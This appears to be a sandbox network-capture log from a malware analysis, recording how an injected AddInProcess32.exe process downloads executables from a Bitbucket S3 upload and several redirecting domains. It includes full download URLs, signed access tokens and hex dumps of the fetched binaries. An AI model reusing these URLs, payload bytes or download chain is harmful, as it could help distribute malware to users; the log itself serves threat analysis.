                                                                                                                                                                                                                                                            x-usage-request-cost: 976.60
                                                                                                                                                                                                                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            x-b3-traceid: 7a8d22a49b919522
                                                                                                                                                                                                                                                            x-usage-output-ops: 0
                                                                                                                                                                                                                                                            x-used-mesh: False
                                                                                                                                                                                                                                                            x-dc-location: Micros-3
                                                                                                                                                                                                                                                            content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ 
https://d136azpfpnge1l.cloudfront.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            x-usage-user-time: 0.028372
                                                                                                                                                                                                                                                            x-usage-system-time: 0.000926
                                                                                                                                                                                                                                                            location: https://bbuseruploads.s3.amazonaws.com/fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            x-served-by: e7bee276ad99
                                                                                                                                                                                                                                                            x-envoy-upstream-service-time: 53
                                                                                                                                                                                                                                                            content-language: en
                                                                                                                                                                                                                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                                                                                            x-b3-spanid: 7a8d22a49b919522
                                                                                                                                                                                                                                                            x-static-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-render-time: 0.04210543632507324
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-usage-input-ops: 0
                                                                                                                                                                                                                                                            x-version: 3c039d08312e
                                                                                                                                                                                                                                                            x-request-count: 3965
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 55625 | 52.217.234.57 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:30:59 UTC | 1119 | OUT | GET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1
                                                                                                                                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
2024-03-11 02:31:00 UTC | 536 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            x-amz-id-2: LOQJCtLIbKDqb8wTBVS4g5d5QlEDgsdpVToVgWRU+4I4xs2y1dEeQFWxnEl6vNm+Bw0QaRGVAno=
                                                                                                                                                                                                                                                            x-amz-request-id: PNEXEW10T4YGT7YK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Last-Modified: Sat, 09 Mar 2024 01:51:54 GMT
                                                                                                                                                                                                                                                            ETag: "d9578a8e9ee343bc53b08fd8101f66e9"
                                                                                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                            x-amz-version-id: P5m1d1MT8MpyYgT1paykScDnj4a0CXh_
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="a02.exe"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Server: AmazonS3
                                                                                                                                                                                                                                                            Content-Length: 323584
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: constructor iterator'`managed vector destructor iterator'`managed vector constructor iterator'`placement delete[] closure'`placement delete closure'`omni callsig' delete[] new[]`local vftable constructor closure'`local vftable'`RT
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC16384INData Raw: e8 ee 40 00 dc ee 40 00 d0 ee 40 00 c4 ee 40 00 b8 ee 40 00 ac ee 40 00 a4 ee 40 00 98 ee 40 00 8c ee 40 00 3e 9f 44 00 dc e9 40 00 c0 e9 40 00 ac e9 40 00 8c e9 40 00 70 e9 40 00 84 ee 40 00 7c ee 40 00 78 a4 44 00 78 ee 40 00 74 ee 40 00 70 ee 40 00 6c ee 40 00 68 ee 40 00 64 ee 40 00 58 ee 40 00 54 ee 40 00 50 ee 40 00 4c ee 40 00 74 a4 44 00 48 ee 40 00 44 ee 40 00 7c a4 44 00 40 ee 40 00 6c a4 44 00 3c ee 40 00 38 ee 40 00 34 ee 40 00 30 ee 40 00 2c ee 40 00 28 ee 40 00 24 ee 40 00 20 ee 40 00 1c ee 40 00 18 ee 40 00 14 ee 40 00 10 ee 40 00 0c ee 40 00 08 ee 40 00 04 ee 40 00 00 ee 40 00 fc ed 40 00 f8 ed 40 00 f4 ed 40 00 f0 ed 40 00 ec ed 40 00 e8 ed 40 00 dc ed 40 00 d0 ed 40 00 c8 ed 40 00 bc ed 40 00 a4 ed 40 00 98 ed 40 00 84 ed 40 00 64 ed 40
                                                                                                                                                                                                                                                            Data Ascii: @@@@@@@@@>D@@@@p@@|@xDx@t@p@l@h@d@X@T@P@L@tDH@D@|D@@lD<@8@4@0@,@(@$@ @@@@@@@@@@@@@@@@@@@@@@d@
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC1024INData Raw: 52 e8 88 20 00 00 8b 46 14 2b c7 83 c4 10 83 7e 18 10 89 46 14 72 03 8b 6d 00 c6 04 28 00 5d 5f 8b c6 5e 5b c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 88 fc 40 00 64 a1 00 00 00 00 50 83 ec 30 a1 28 c0 41 00 33 c5 89 45 ec 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b 45 08 6a ff 33 f6 8b d9 56 50 8d 4d d0 89 5d c8 c7 45 e8 0f 00 00 00 89 75 e4 c6 45 d4 00 e8 be fb ff ff 89 75 fc 8b 4b 04 3b ce 74 18 8b 7b 0c 2b f9 b8 93 24 49 92 f7 ef 03 d7 c1 fa 04 8b f2 c1 ee 1f 03 f2 85 c9 75 04 33 c0 eb 18 8b 7b 08 2b f9 b8 93 24 49 92 f7 ef 03 d7 c1 fa 04 8b c2 c1 e8 1f 03 c2 ba 49 92 24 09 2b d0 83 fa 01 73 05 e8 9b 02 00 00 85 c9 75 04 33 c0 eb 18 8b 7b 08 2b f9 b8 93 24 49 92 f7 ef 03 d7 c1 fa 04 8b c2 c1 e8 1f 03 c2 83 c0 01 3b f0 0f
                                                                                                                                                                                                                                                            Data Ascii: R F+~Frm(]_^[Ujh@dP0(A3ESVWPEdeEj3VPM]EuEuK;t{+$Iu3{+$II$+su3{+$I;
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC16384INData Raw: 00 00 00 00 2b d1 03 d2 03 d2 52 e8 10 22 00 00 83 c4 04 83 c4 10 c3 83 c8 ff 33 d2 f7 f1 83 f8 1c 73 da 8d 04 24 50 8d 4c 24 08 c7 44 24 04 00 00 00 00 e8 c2 1c 00 00 68 e0 9f 41 00 8d 4c 24 08 51 c7 44 24 0c bc 02 41 00 e8 d7 57 00 00 cc cc cc cc cc 8b 44 24 04 56 50 8b f1 e8 63 e0 ff ff c7 06 c4 1b 41 00 8b c6 5e c2 04 00 cc cc cc cc cc cc cc 55 8b ec 6a ff 68 10 fa 40 00 64 a1 00 00 00 00 50 83 ec 1c 53 56 57 a1 28 c0 41 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b f9 89 7d ec 8b 45 08 8b f0 83 ce 0f 83 fe fe 76 04 8b f0 eb 22 8b 5f 18 b8 ab aa aa aa f7 e6 8b cb d1 e9 d1 ea 3b d1 73 0e b8 fe ff ff ff 2b c1 3b d8 77 03 8d 34 19 33 db 8d 4e 01 3b cb 89 5d fc 77 10 33 c9 51 e8 35 21 00 00 83 c4 04 89 45 08 eb 58 83 c8 ff 33 d2 f7 f1 83 f8 01 73 e6
                                                                                                                                                                                                                                                            Data Ascii: +R"3s$PL$D$hAL$QD$AWD$VPcA^Ujh@dPSVW(A3PEde}Ev"_;s+;w43N;]w3Q5!EX3s


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 55630 | 172.67.200.219 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:31:00 UTC | 38 | OUT | GET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
2024-03-11 02:31:00 UTC | 1188 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6ImhBMCtidk8vcU5YOVROR3pvcnljZXc9PSIsInZhbHVlIjoiV0UyRlB6Rkdzb3htdVd4RTlVOVJLWnF5Zy9UWjIyN1F2eFFwWlBqSTY2akQzSnlSMXUyYVBQc1JmK0RuWWNTanFFV3pGcVdpWXFGMHJrRG1FK3NqczhqUWdRMWp3a1ZpSGgzc1JRYjI5ZGs1WTZJcHNyYThpa2pmQmpuaDBRbFoiLCJtYWMiOiI0MWUzYWY0OWI0Mjk2Y2U2MjMzMWQ2MmMxNzFkMDhkMmFkNjU5ZDk4NmY5ZGE3NzI5NjExODdkNTA5YTY2ZTJmIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:31:00 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                            set-cookie: shortiny_session=eyJpdiI6IlpwY1R1QnBWZW9MdFVnTFduTlNhSnc9PSIsInZhbHVlIjoiUktHb1lyOUJQOUtBYnZ1VVNBM2xRRHlZbm83a0t5dXZpblhjVXQxcEZHcTQzalUwTjFaSnkwd1RDeHh0RFg1djM0WDFiR2dBUXpTUUF1VjY0OC9obDlKUjhMNzgvVFZmMHJzVXgrZDlPTDFVOWRQVFZOWlNCblVuUkZjNnBlalUiLCJtYWMiOiJlZDVkN2VjNTE2YjYyN2NjZDM4Y2VhZmEwYjdkY2NiYmJlMjliZmJlMmRkZGExMTExM2QxMWVjZDE4YTUzMjNmIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:31:00 GMT; Max-Age=7200; path=/; httponly
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 55631 | 104.21.32.142 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:31:00 UTC | 79 | OUT | GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
2024-03-11 02:31:00 UTC | 705 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bdjtJTyyykrXTOY0s5auBQBpE7Wykc%2F0Q6sxQ6AmNC433J%2Fb%2BCOkAjpSwVfW0SK89JHW6HN0nQtRWflq9%2BT1p5XTmKbFQFn1q3yPb1A2D9TK1OVhioNvXC315HU08y6o5GIv%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820340b5e0ad7-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 55632 | 172.67.178.183 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:31:00 UTC | 74 | OUT | GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: namemail.org
2024-03-11 02:31:00 UTC | 693 | IN | HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JAntoR3PkFDCrr1EI6QP%2B1QqwEbz87hKD3woQF899P07z%2F%2BpzveyTRtNFUHGvm6kUrr2OrFuJ%2BiGkbpRUMTyG6uXZHJWHSJ4M6WWcxYj5tj52tIbzD%2B5nDMg%2F8V71sg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820352fbf09fd-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC131INData Raw: 37 64 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 74 72 61 64 65 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 7d<a href="https://ittrade.org/26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:31:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 55636 | 3.5.20.209 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1119OUTGET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1
                                                                                                                                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
2024-03-11 02:31:01 UTC | 548 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            x-amz-id-2: +rTpzE++1U0ad6TJZrGhHh/4498R/ZvI4wNqWRR7KA/u3dHpiE7o5yVI54zdMIlqBbsWyylODfigV1dBqLCZuw==
                                                                                                                                                                                                                                                            x-amz-request-id: 9XXWF337X59ZR7K9
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:02 GMT
                                                                                                                                                                                                                                                            Last-Modified: Sat, 09 Mar 2024 01:51:54 GMT
                                                                                                                                                                                                                                                            ETag: "d9578a8e9ee343bc53b08fd8101f66e9"
                                                                                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                            x-amz-version-id: P5m1d1MT8MpyYgT1paykScDnj4a0CXh_
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="a02.exe"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Server: AmazonS3
                                                                                                                                                                                                                                                            Content-Length: 323584
                                                                                                                                                                                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 55637 | 104.21.63.71 | 443 | 4264 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-11 02:31:01 UTC | 110 | OUT | GET /26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: lawyerbuyer.org
2024-03-11 02:31:01 UTC | 678 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283792
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:53:03 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 5
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CIV5WCPcUh5aOPHYaQ9ASUfgKEEMGo2I3R8UqGPWRVPMlhCCFgiIN2cikJ4Iaxc3wmt%2FTMzHpNsvqMuTpOxzHY2eg%2FIChnAjv5lWhn0gus0O6KcNlvRv2WoceV4o3Vj5lJA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203aefce0ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|~d=
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83 f8 fe
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt\
